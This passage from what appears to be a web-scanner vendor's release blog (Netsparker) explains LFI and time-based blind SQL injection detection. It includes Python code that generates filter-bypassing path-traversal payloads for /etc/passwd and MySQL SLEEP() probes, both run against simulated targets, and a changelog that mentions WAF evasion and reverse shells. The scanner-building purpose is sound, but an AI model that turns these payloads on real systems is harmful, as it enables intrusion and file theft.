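    # exactly the kind of blacklist the bypass variants below are aimed at.
    decoded = unquote(page_param)
    filtered = decoded.replace("../", "")
    path = posixpath.normpath(WEBROOT + filtered)
    return FAKE_FS.get(path, "404 Not Found")


# A hit is only reported when the response carries the target file's signature.
SIGNATURES = {
    "/etc/passwd": re.compile(r"^root:[^:\n]*:0:0:", re.M),      # *nix account database
    "/windows/win.ini": re.compile(r"^\[fonts\]", re.M | re.I),   # Windows equivalent
}


def traversal_variants(target, depth=6):
    """The traversal forms a scanner tries, from the plain one to filter bypasses."""
    rel = target.lstrip("/")
    plain = "../" * depth + rel
    yield plain                                  # straightforward traversal
    yield "....//" * depth + rel                 # survives a single-pass "../" strip
    yield plain.replace("../", "..%2f")          # URL-encoded slash
    yield plain.replace("../", "%2e%2e/")        # URL-encoded dots
    yield plain.replace("../", "%252e%252e/")    # double-encoded, for apps that decode twice


def confirm_lfi(send, targets=SIGNATURES):
    """Return (target file, working payload) for the first variant whose response
    matches the file's signature, or None. `send` maps a parameter value to a body."""
    for target, signature in targets.items():
        for payload in traversal_variants(target):
            if signature.search(send(payload)):
                return target, payload
    return None


if __name__ == "__main__":
    print(confirm_lfi(vulnerable_include))
```

The plain `../` payload is silently neutralised by the filter and returns the 404 page; the `....//` variant is the first one to come back with `root:x:0:0:`, so that is the payload reported, together with the file it proved readable. Matching on the file signature rather than on "the response changed" is what keeps a custom 404 page or a generic error from being counted as a finding.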

Resume Feature

In the previous version there were some bugs when you tried to load an unfinished scan and resume it. We addressed these bugs, so you can save a scan in the middle of crawling, attacking or anything else, then load it and continue later on.

Better Time Based Blind SQL Injection Detection

It's clear that Netsparker has the best SQL Injection detection engine when it comes to MySQL, Oracle and SQL Server. Unlike other scanners, Netsparker doesn't just try "OR 1=1": it analyses the backend database, carries out many database-specific tests to find SQL Injections in many situations, then confirms the SQL Injection by safely exploiting it, and finally runs post-exploitation checks to find further issues, such as the database user having administrator privileges.

In this new version we updated the Blind SQL Injection engine to make it even better. It now analyses server response times and works out the wait time it needs, which means that even when responses from the server are unusually slow or the application is a bit unreliable, Netsparker can still identify and confirm the SQL Injection.
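The paragraph above describes measuring the server before choosing a wait time. As an added example (written for this page, not Netsparker's engine), here is that procedure in code: sample a harmless value to get the baseline and its spread, scale the `SLEEP()` delay so it dominates the noise, then send a conditioned probe and a control probe that differ only in the condition, and require every conditioned request to carry the delay and every control not to. The `fake_server` function, its latency/jitter parameters and the MySQL probe shape are all constructed for the example; it returns elapsed seconds instead of really sleeping, so it runs offline:

```python
import random
import re
import statistics


def mysql_probe(delay, condition_true):
    """Time-based probe for MySQL. The same SLEEP() is present in test and control;
    only the condition differs, so a slow keyword filter or WAF cannot fake a hit."""
    condition = "1=1" if condition_true else "1=2"
    return f"1 AND IF({condition},SLEEP({delay:.1f}),0)"


def measure_baseline(send, benign_value="1", samples=5):
    """Median response time and observed spread for a harmless value."""
    times = [send(benign_value) for _ in range(samples)]
    return statistics.median(times), max(times) - min(times)


def confirm_time_based(send, build_probe=mysql_probe, samples=3, max_delay=15.0):
    """Pick a wait time that dominates the measured noise, then require every
    conditioned request to carry it and every control request not to."""
    baseline, spread = measure_baseline(send)
    delay = max(2.0, 4.0 * spread, 2.0 * baseline)   # scale up on slow or jittery links
    if delay > max_delay:
        return {"confirmed": False, "reason": "link too unstable to test safely"}
    slow = [send(build_probe(delay, True)) for _ in range(samples)]
    control = [send(build_probe(delay, False)) for _ in range(samples)]
    threshold = baseline + 0.5 * delay
    confirmed = all(t >= threshold for t in slow) and all(t < threshold for t in control)
    return {"confirmed": confirmed, "delay": delay, "baseline": baseline, "spread": spread}


# Constructed stand-in for the target (not real network code): returns elapsed seconds
# instead of sleeping, with seeded jitter so a run is repeatable.
def fake_server(vulnerable, latency, jitter, seed=7):
    rng = random.Random(seed)
    sleep_re = re.compile(r"IF\(1=1,SLEEP\(([\d.]+)\)")

    def send(payload):
        elapsed = latency + rng.uniform(-jitter, jitter)
        match = sleep_re.search(payload)
        if vulnerable and match:          # only the true branch actually waits
            elapsed += float(match.group(1))
        return elapsed

    return send


if __name__ == "__main__":
    print(confirm_time_based(fake_server(vulnerable=True, latency=3.0, jitter=0.4)))
```

On a server with a 3-second baseline the chosen delay is over 5 seconds rather than a fixed 2, which is the point of measuring first: a fixed short delay on a slow link is indistinguishable from ordinary latency. The control probe matters just as much; without it, a server that stalls on any request containing `SLEEP` would be reported as injectable.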

Old School Changelog

  • Issue report quality increased by adding and refining the content.
  • There is a new option to wait for all static resource attacks before moving on to the attacking phase. By default Netsparker will not wait to find all directories before leaving the Crawling phase; you can override this from the settings.
  • URL Based XSS attack patterns improved.
  • Permanent/Stored Cross-site Scripting (XSS) reports are now much better. They show the injection point, output point and all other required details in the report.
  • LFI Engine improved. A couple of bugs fixed; IDS/WAF evasion techniques, new attacks and a new confirmation method added to confirm more LFI issues.
  • Minor form authentication related bugs fixed.
  • A new vulnerability check added that converts limited LFI attacks into Cross-site Scripting.
  • LFI exploitation related bugs fixed.
  • In the last update, due to some internal changes, we had to remove Cross-site Scripting detection inside "script" blocks. Now it's back, with confirmation.
  • Support for XSS in HTML comments is back with confirmation.
  • Report threshold increased for possible SQL Injections, which means fewer [Possible] reports.
  • A new check added to report when the configured Form Authentication doesn't seem to work, and extra checks added to avoid recursive loops caused by incorrect form authentication settings.
  • Crashes in the JavaScript parser (NetsparkerHelper) addressed; extra checks added so it recovers itself in case of a crash.
  • Some bugs related to ViewState decoding addressed, and ViewState analysis now supports .NET Framework 1.x ViewState.
  • GUI performance increased; even when more than 100 vulnerabilities are reported per second the GUI stays responsive.
  • Overall performance increased; Netsparker can now process more than 500 requests per second on a Core i7.
  • We massively decreased Netsparker's memory usage. You can test really big websites that take days to scan and millions of requests to attack, and Netsparker will finish the scan without using too much memory.
  • Data Length bug in SQL Injection exploitation addressed.
  • JavaScript parser crash on some Windows XP systems addressed.
  • During JavaScript analysis, XMLHttpRequest calls were bypassing the include/exclude rules and the scan scope. Addressed.
  • Incorrect figures in the dashboard during the Recrawling phase addressed.
  • A bug in getting a reverse shell from boolean-based SQL Injections addressed.
  • A theme problem in message boxes addressed.
  • Merging scans was causing old issues to be lost from the issues panel during load and new scans. Addressed.
  • There were some bugs when resuming a loaded scan. Now Netsparker can resume scanning from any previously saved scan, so you can start a scan, save it in the middle, load it later and continue.
  • One of the XSS attacks was missing from Permanent/Stored XSS detection. This issue has been addressed.
  • Blind SQL Injection confirmation improved. The new confirmation engine analyses server response performance and tweaks the attacks to match server overhead, so it can confirm Blind SQL Injections even over really slow or unstable connections.
  • A problem in Static Checks addressed. It was causing some hidden directories to be missed if the initially requested directory returned a 3xx code.
  • Some bugs in heuristic URL Rewrite detection on big websites addressed.
  • A bug causing the crawling stage to get stuck on the last 1 or 2 requests addressed. This was happening in only about 1 in 100 scans.
  • Licence Loader theme changed to the native OS theme on Windows 7/Vista.
  • New settings interface introduced. It explains all the important settings and allows you to configure them easily. If you know what you are doing and want to access all advanced settings, hold "Ctrl" and click "Settings"; this opens the advanced settings panel instead of the new settings panel.
  • A bug in saved login scripts addressed.
  • Request Monitor removed. If you need similar functionality, please refer to the "How to see all HTTP Requests and Responses" topic.

The Academy Pro Contest


We are giving away one Netsparker Professional license to The Academy Pro Contest, see the details.

Netsparker Community Edition - Free web app scanner is out!

Big news for us, our customers and the whole security community…

Netsparker® Free Community Edition

Mavituna Security Ltd is proud to announce the release of Netsparker Community Edition.

Netsparker Community Edition is False Positive Free and can detect both SQL Injection and Cross-site Scripting issues better than many other scanners.

Netsparker Community Edition also detects many other vulnerabilities, such as backup files, source code disclosure, crossdomain.xml issues, SVN/CVS disclosure, internal path disclosure, error messages and many more.

Don't take our word for it: simply fire up your favourite scanner and compare its results with those from Netsparker Community Edition. You won't see a false positive from Netsparker Community Edition, and it'll find more vulnerabilities.

Web application security is a big challenge and Netsparker® Community Edition is a vital tool for the security community and developers alike.

Netsparker® Professional

Netsparker Community Edition shares the same base engine with Netsparker® Professional.

The Netsparker® family are not simply more web application security scanners but represent a step forward into the next generation. Netsparker features False Positive Free Scanning, Integrated Exploitation, Post-Exploitation Vulnerability Assessment and accurate detection.

Netsparker Professional users also benefit from enterprise features, more security checks, priority technical support and updates.

 

DOWNLOAD NETSPARKER COMMUNITY EDITION

 

Regards,

Ferruh Mavituna
Founder and Lead Developer of Netsparker

Netsparker and Apache.org - JIRA incident

Apparently, by exploiting a Cross-site Scripting vulnerability, attackers gained access to users' passwords at Apache.org and in JIRA (some passwords in JIRA were stored in plain text).

Today, when I heard the news, I decided to download the latest demo version of JIRA and give it a try with Netsparker. Not surprisingly, Netsparker identified more than 10 XSS vulnerabilities in JIRA.

Obviously I don't know the details of the attack, or whether it relied only on one of these Cross-site Scripting vulnerabilities, but presumably this attack would have been prevented if either JIRA or Apache.org had used Netsparker Professional or the free Netsparker Community Edition.

I have already emailed the Apache Security Team and offered them a free Netsparker Professional license.

Netsparker is still scanning the test system, but it has already identified many XSS instances, Permanent XSS issues and many other minor issues.

Netsparker v1.3.7.38 Release

Lots of improvements in the Permanent XSS, XSS and SQL Injection engines. We also added experimental Second Order SQL Injection support.

There were some issues regarding Proxy and Proxy Authentication; all of those have been addressed as well.

There are many other improvements and some bug fixes; check out the details in the Netsparker v1.3.7.38 changelog.